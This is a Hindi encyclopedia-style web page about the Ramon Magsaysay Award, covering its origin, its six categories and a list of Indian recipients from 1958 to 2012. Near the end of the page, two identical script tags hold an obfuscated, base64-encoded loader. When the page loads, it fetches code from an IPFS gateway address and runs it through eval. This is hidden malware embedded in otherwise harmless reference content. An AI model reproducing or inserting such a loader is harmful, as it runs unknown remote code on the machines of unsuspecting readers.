रेमन मैग्सेसे पुरस्कार

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
रेमन मैग्सेसे पुरस्कार
Megsesey award

रेमन मैग्सेसे पुरस्कार की स्थापना 1957 में हुई। इसका नामकरण फिलीपींस के राष्ट्रपति रेमन मैग्सेसे के नाम परा हुआ, जिनकी 1957 में एक विमान दुर्घटना में मृत्यु हो गयी थी। वे 1950 के दशक में अपने भूमि सुधार कार्यक्रमों के माध्यम से कम्युनिस्टों की घुसपैठ को नाकाम करने के लिए विश्वविख्यात हुए। यह पुरस्कार प्रतिवर्ष मैग्सेसे जयंती पर 31 अगस्त को लोक सेवा, सामुदायिक सेवा, पत्रकारिता, साहित्य तथा सृजनात्मक कला और अंतर्राष्ट्रीय सूझबूझ के लिए प्रदान किया जाता है। यह पुरस्कार ग़ैर एशियायी संगठनों, संस्थानों को भी एशिया के हित में कार्य करने के लिए दिया जा सकता है।

पुरस्कार की संकल्पना

प्रारम्भ से ही रेमन मैग्सेसे पुरस्कार की संकल्पना 'जनता की सेवा में भावनाओं की महानता प्रदर्शित करने के लिए' की गयी थी। इस पुरस्कार की क्षेत्र सीमा के अंतर्गत पूर्वी, दक्षिण पूर्वी तथा दक्षिण एशिया तथा एशिया में रहने वाला कोई भी व्यक्ति, उसकी जाति, लिंग अथवा धर्म का भेदभाव किए बिना शामिल होते हैं। यद्यपि राष्ट्राध्यक्ष तथा शासनाध्यक्ष तथा उनके पति या पत्नी अपने कार्यकाल के समय इस पुरस्कार के पात्र नहीं होते।

पुरस्कार की श्रेणियाँ

यह पुरस्कार प्रतिवर्ष 6 श्रेणियों में दिया जाता है -

शासकीय सेवा

सरकार की किसी भी शाखा में जिनमें कार्यपालिका, न्यायिक सेवा, विधायिका अथवा सेना में उल्लेखनीय सेवा हेतु सम्मानित करने के लिए।

सार्वजनिक सेवा

किसी भी नागरिक द्वारा जनता के हित में की गयी उल्लेखनीय सेवा को समाहित करना।

सामुदायिक नेतृत्व

किसी समुदाय का नेतृत्व, सुविधाहीन लोगों को अधिकाधिक अवसर तथा बेहतर जीवन संबंधी सहायता प्रदान करने के लिए सम्मान।

पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला

प्रभावी लेखन, प्रकाशन अथवा फोटोग्राफ़ी या रेडियो, टेलीविज़न, सिनेमा अथवा कला प्रदर्शन के माध्यम का जनहित में कार्यरत एक शक्ति के रूप में उपयोग।

शांति तथा अंतर्राष्ट्रीय सद्भावना

देश में तथा उनके बीच निरंतर मित्रता के विकास हेतु आधारशिला तैयार करने के लिए मित्रता, सह-अस्तित्व, शांति तथा एकजुटता को बढ़ावा देने हेतु किये गये योगदान के लिए सम्मान।

उभरता नेतृत्व

40 वर्ष अथवा इससे कम उम्र के लोगों का उनके समुदाय में सामाजिक बदलाव के लिए किए गये उल्लेखनीय कार्य के लिए सम्मान, जिनके नेतृत्व को अभी तक उनके समुदाय से बाहर पहचान नहीं मिली है।

उपलब्धि

पुरस्कार पाने वालों में में कुछ एशिया के महान मानवतावादी, सामुदायिक नेता, बुद्धिजीवी तथा कलाकार शामिल हैं। यह इस पुरस्कार की उपलब्धि है, परंतु इसके प्राप्तकर्ताओं में ऐसे लोग भी शामिल हो सकते हैं जो किसी सार्वजनिक पहचान की अपेक्षा किए बिना चुपचाप दूसरे लोगों की मदद करते रहते हैं।

रेमन मैग्सेसे पुरस्कार से सम्मानित भारतीयों की सूची
रेमन मैग्सेसे पुरस्कार
क्रम वर्ष प्राप्तकर्ता क्षेत्र चित्र
1. 1958 विनोबा भावे सामुदायिक नेतृत्व
Vinoba-Bhave-2.jpg
2. 1959 सी. डी. देशमुख शासकीय सेवा
Cd-deshmukh.jpg
3. 1961 अमिताभ चौधरी पत्रकारिता, साहित्य तथा सृजनात्मक संवाद कला
4. 1962 मदर टेरेसा अंतर्राष्ट्रीय सद्भाव
Mother-Teresa-2.jpg
5. 1963 दारा एन.खुरोदी, सामुदायिक नेतृत्व
6. 1963 त्रिभुवनदास के.पटेल सामुदायिक नेतृत्व
7. 1963 वर्गीज़ कुरीयन सामुदायिक नेतृत्व
Verghese-Kurien.jpg
8. 1965 जयप्रकाश नारायण जनसेवा
Jayaprakash-Narayan.jpg
9. 1966 कमला देवी चटोपाध्याय सामुदायिक नेतृत्व
Kamladevi-chattopadhyay.jpg
9. 1967 सत्यजीत रे पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
Satyajit-Ray.jpg
10. 1971 एम. एस. स्वामीनाथन सामुदायिक नेतृत्व
11. 1974 एम.एस.सुब्बलक्ष्मी जनसेवा
Subbulakshami.jpg
12. 1975 बी. जी. वर्गीज़ पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
BGVerghese.jpg
13. 1976 शम्भु मित्रा पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
14. 1977 इला रमेश भट्ट सामुदायिक नेतृत्व
15. 1979 राजनकांत अरोल तथा माबेला अरोल सामुदायिक नेतृत्व
16. 1981 गौर किशोर घोष पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
17. 1981 प्रमोद करण सेठी सामुदायिक नेतृत्व
18. 1982 चण्डी प्रसाद भट्ट सामुदायिक नेतृत्व
19. 1982 मनीभाई देसाई जनसेवा
20. 1982 अरुण शौरी पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
21. 1984 आर. के. लक्ष्मण पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
22. 1985 मुरलीधर देवीदास आमटे (बाबा आम्टे) जनसेवा
23. 1989 लक्ष्मीचंद जैन जनसेवा
24. 1991 के. वी. सुबन्ना पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
25. 1992 पंडित रविशंकर पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
26. 1993 बानू कोयाजी जनसेवा
27. 1994 किरण बेदी शासकीय सेवा
28. 1996 टी. एन. शेषण शासकीय सेवा
29. 1996 पांडुरंग अठावले सामुदायिक नेतृत्व
30. 1997 महेश चन्द्र मेहता जनसेवा
31. 1997 महाश्वेता देवी साहित्य, पत्रकारिता तथा सृजनात्मक संप्रेषण कला
32. 2000 जॉकिन अर्पुथम शांति और अंतर्राष्ट्रीय समझौता
33. 2000 अरुणा रॉय सामुदायिक नेतृत्व
34. 2001 राजेंद्र सिंह सामुदायिक नेतृत्व
34. 2002 संदीप पांडेय आपातकालीन नेतृत्व
35. 2003 शांता सिन्हा सामुदायिक नेतृत्व
36. 2003 जेम्स माइकल लिंगदोह शासकीय सेवा
37. 2003 लक्ष्मीनारायण रामदास शांति और अंतर्राष्ट्रीय समझौता
38. 2005 वी. शांता जनसेवा
39. 2006 अरविंद केजरीवाल आपातकालीन नेतृत्व
40. 2007 पी. साईनाथ साहित्य, पत्रकारिता तथा सृजनात्मक संप्रेषण कला
41. 2011 नीलिमा मिश्रा आपातकालीन नेतृत्व
42. 2011 हरीश हांडे
43. 2012 कुलांदेई फ्रांकिस


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>